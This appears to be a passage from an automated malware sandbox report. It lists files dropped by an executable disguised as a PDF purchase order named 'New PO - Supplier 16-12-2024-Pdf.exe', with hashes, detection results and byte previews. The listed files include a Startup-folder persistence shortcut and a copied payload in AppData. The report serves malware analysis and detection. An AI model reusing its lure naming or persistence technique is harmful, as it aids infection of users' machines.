                                                                                                                      SHA-256:CB8B17A41E435D9AE899A65674C8A52D379559D1925FDA80CD80148AC985A266
                                                                                                                      SHA-512:D06F6EF2C35399B27D2EF23802B2F72C7194BE2D8036CC3EFB3C36ADDD6FCB35B8A49886948CB15B4887254995CD2DBDC679D4FBD971C1A0166B835AD6BE1F55
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="asnqT-TuceZ0oeOSr2JMZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\kVKaC4v.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.262457409575948
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                                      MD5:2D00B3855E2126948C70668E01FC64D6
                                                                                                                      SHA1:96A1FBAF15805E8248999DCC7B7990AA45ADDD7B
                                                                                                                      SHA-256:32E9867BCD8CB1488E73839B11D6F890FEA1F1F5A440D3896AEA4B7C371F8DE7
                                                                                                                      SHA-512:EE6120A42B00D71A7456EE106357766467E2B23858C186D50E1C0C64F355C164F1E852328F63338CD26A6E517299718A43511E3C3450EA5221BD292E6020F1B9
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FA9Xep5AlQ8_84ON37o3nA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\lDqsMCS.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.259773263731156
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+A+pAZewRDK4mW
                                                                                                                      MD5:740EA8413A6368DC9570720A4EBC5821
                                                                                                                      SHA1:AC9B26CEBAB378EB834B43706E048D1E5DFEC278
                                                                                                                      SHA-256:E16174AB693623A65B64321C0C0F8BF4E05651864FC1AB8B5384BC8D7C328477
                                                                                                                      SHA-512:2BEDDE870E548C7DE74978F5916DA8B37721608AADC7DCB75E18C8B4D9D2F4F33C04378962ACCB5C776C70A409D3FCCAEB0D05F3E1B335DF34A863CF5B525928
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f9u-7gF9N7TgNBqZ8AhGlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\ozzhZao.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.273898229746175
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+A+pAZewRDK4mW
                                                                                                                      MD5:0D7E78DDBFFFAC38896070BA58374E2E
                                                                                                                      SHA1:F58C1FF7D73485F450F6DD6C7A047D9F6B05F8F1
                                                                                                                      SHA-256:AA04B2F5AC09A5CA4193E62D9C8AEB92574780BFDD7E7A8034054BD6ACD1218A
                                                                                                                      SHA-512:D34F84D51BA953ACC3A6DF2BE6E5A0693912F524B105CBAF68D30A1B31512290418D4038177E609C3702CCABF04904A61A07E3F265A51CBF6A1E2DE981FA331C
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KsZSHbsn2Ut6MN4gLA6XCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\qBErM3B.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2713699107810985
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0RCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                                                      MD5:E25A4C6AAB743C7B2B2333326D74781E
                                                                                                                      SHA1:06EEF4E1DEBB71E5D57DF5AC37A76E915EC09EB0
                                                                                                                      SHA-256:C56ABCD3E86AE0E3E5D153FE93E6BBAED3F9EE4921D54474CEC97A5DCA30A2A4
                                                                                                                      SHA-512:B5FA074EC257936518C51CB5A15147DE447DBD2A008B5D8AE1A30E1C5DFA4EF9F468F1B3D3E37AC1670A7774CAA5C6DB2A9E04CB81763FFEA689A7B56C4C4C58
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fYR7kPWL-8XsFQHaj0__fQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\s8sevnj.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.269260888522754
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                                      MD5:E1FE3C3F82C54357D18C7E334469EBDF
                                                                                                                      SHA1:9ED856575B6E9FF029CA754964A30D26FA223621
                                                                                                                      SHA-256:9090F0C1F42EA9F3A1EF5D104560E66DD870F0A287264B7B681563C8F93CCE84
                                                                                                                      SHA-512:4DC24D099F990F019CA12FC0ECF773B29A3C75570040AB9AF4343DF3C3432BDC7A263B9803907F967CBCF0B12633FED91CBEB433408E7CACC1A37B168CE74C3C
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YkXV66GpMG59Vu6r-s59zQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\tQjr7Fa.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2560251255999395
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0jnDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+qD+pAZewRDK4mW
                                                                                                                      MD5:95320515633B860DA15E0FAA854DA3D6
                                                                                                                      SHA1:DEFE718D0EC99C699B41A2431E7B3249DF8C93AC
                                                                                                                      SHA-256:88A33861419543A26000DC2C2B98F821BD877084A1C49444267F7FE2D87C4A85
                                                                                                                      SHA-512:9F2940492F68E117652F14723A1561318AF14BC4B189D1CA9654B505F987C0E0B0D946AF51BB324AAB82EE6D40A862892A7D396CB246AA9EEF545BBC49967928
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bD5Zp_rX77eer_mMD1NAlQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\tSOUYy2.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.25740421357173
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0KXUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                                                      MD5:043F05BEED000B7783E4A3A4961F00BE
                                                                                                                      SHA1:CC63C431160D8F5EBDCDE843B56D5F21B45ABBDB
                                                                                                                      SHA-256:88EA213F2A7B21B17DA6CDF1E123CB48ED8798A52060F454606D5187602657F8
                                                                                                                      SHA-512:9588AF7263F8C5DA2ED9DC3F012AAB3459EC6DE901BD79DF0B9034801CAEECC468FC886E80793554361AD37D0C9AE8460BBEA4DDA9C2380F7C1A775A16CE096E
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mczbxL8zSM7oawmB8i6KBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\td1E7j3.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2525144138374165
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                      MD5:E1EF9BBEE09F05138E932F34C4D4658A
                                                                                                                      SHA1:4B0B0244A1D65F824A7EAEB7CD3E317E82590DDD
                                                                                                                      SHA-256:48BA7F3C4FCFB5C0B9F57C81E6D4265163EDD601F7A529583D85EB53251003D0
                                                                                                                      SHA-512:FB99DA8411871F0C78332747C91475DC5962AD605EAE5B2FB15A0EF569AB18AC8149074170B82EA284673D02F3CEEC9A27924A3BECE881E333284275038E801B
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5XL7Fcf_j-rSpe30fO51xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\vFy4tFp.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.272480117144151
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0VjzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+uz+pAZewRDK4mW
                                                                                                                      MD5:068D1918BA1CD97B4330E1E5FA7FB5C5
                                                                                                                      SHA1:8EB4CEAE32014164E30D77C364958BFACF385C77
                                                                                                                      SHA-256:C979C4387D8970575EB7ECB33DDDCC41619BE6905CD469CBBD256F4829EB430F
                                                                                                                      SHA-512:2581533F3D6CA460F33C1749A753302A3679AA8C85A7EF98271C050A878099BEAAB7C01F796AB32FA68BCF2139DC741EAE2C65660B5DBE1DB102F8433D08D391
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DISTE6xdRGZdphVPQIF6gg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\~$NEnoihuS.xlsm

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):165
                                                                                                                      Entropy (8bit):1.610853976637159
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                                      MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                                      SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                                      SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                                      SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                                      Malicious:false
                                                                                                                      Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9299D8622CE1640F.TMP

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                      Malicious:false
                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnk

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:40:28 2024, mtime=Mon Dec 30 09:40:28 2024, atime=Mon Dec 30 09:40:28 2024, length=1432064, window=hide
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1814
                                                                                                                      Entropy (8bit):3.4190393034798285
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:8chDvlXUEezeC67IPIAFaFhoE2+s9T4IlD5m:8chDvl1a5HImr9MIlt
                                                                                                                      MD5:F883D1C72C50DE18A4AA588458B9B8CB
                                                                                                                      SHA1:0434B8E0080CAF085D4F8F5C4147CEB42C118B35
                                                                                                                      SHA-256:F1DA1C50E1A334BC45FF497A3E0EECF13DED1BAD248FE493EBB20D0CC3017741
                                                                                                                      SHA-512:8608E5FFECE32E293109C4BCBB805FCC2A8F3E161988D929867ABA2A7AE243FEDD813F2B6A0A2F7B127DB4BBC771CFB7BB7A0EC18BBF4D7D5B7A198721D79050
                                                                                                                      Malicious:false
                                                                                                                      Preview:L..................F.@.. ...@1.=.Z.....=.Z.....=.Z............................:..DG..Yr?.D..U..k0.&...&.......$..S......7.Z...}.>.Z......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.U...........................^.A.p.p.D.a.t.a...B.V.1......Y.U..Roaming.@......EW<2.Y.U..../.....................r...R.o.a.m.i.n.g.....V.1......Y.U..Windata.@......Y.U.Y.U...........................O?.W.i.n.d.a.t.a.....`.2......Y.U .TXAASJ.exe..F......Y.U.Y.U...........................l..T.X.A.A.S.J...e.x.e.......c...............-.......b...........s..R.....C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.T.X.A.A.S.J...e.x.e.,.".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll......................................................................................................

                                                                                                                      C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1432064
                                                                                                                      Entropy (8bit):7.20532961543164
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Z4lavt0LkLL9IMixoEgea2A08ob7xV6+SXq8iMPRNhJNcbq9MmCS:okwkn9IMHea2A07SXq6zMaPCS
                                                                                                                      MD5:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      SHA1:4430A5461B9C0B5FB8AD0398EDAD7B5E89159441
                                                                                                                      SHA-256:90520E67BFFE18505E7D77356A0ADBF8AB6663862EF765387EEAF6E2CE5A32D6
                                                                                                                      SHA-512:4F953EAD572C92BDE737227C1AFA88BC2D274118E42C99E9245405B4748FA0F258CA8B334ECF219E5C7D2ADBBF9185CA4CBBDCC5EF312C26AA7E81BD32D0610C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..................k............@..........................@......%.....@...@.......@.....................lk..|....@..TE...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc...TE...@...F..................@..@.reloc..b............4..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1432064
                                                                                                                      Entropy (8bit):7.20532961543164
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Z4lavt0LkLL9IMixoEgea2A08ob7xV6+SXq8iMPRNhJNcbq9MmCS:okwkn9IMHea2A07SXq6zMaPCS
                                                                                                                      MD5:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      SHA1:4430A5461B9C0B5FB8AD0398EDAD7B5E89159441
                                                                                                                      SHA-256:90520E67BFFE18505E7D77356A0ADBF8AB6663862EF765387EEAF6E2CE5A32D6
                                                                                                                      SHA-512:4F953EAD572C92BDE737227C1AFA88BC2D274118E42C99E9245405B4748FA0F258CA8B334ECF219E5C7D2ADBBF9185CA4CBBDCC5EF312C26AA7E81BD32D0610C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..................k............@..........................@......%.....@...@.......@.....................lk..|....@..TE...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc...TE...@...F..................@..@.reloc..b............4..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\Documents\IPKGELNTQY\NEBFQQYWPS.xlsm

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18387
                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                      Malicious:false
                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                      C:\Users\user\Documents\IPKGELNTQY\~$NEBFQQYWPS.xlsx

                                                                                                                      Download File
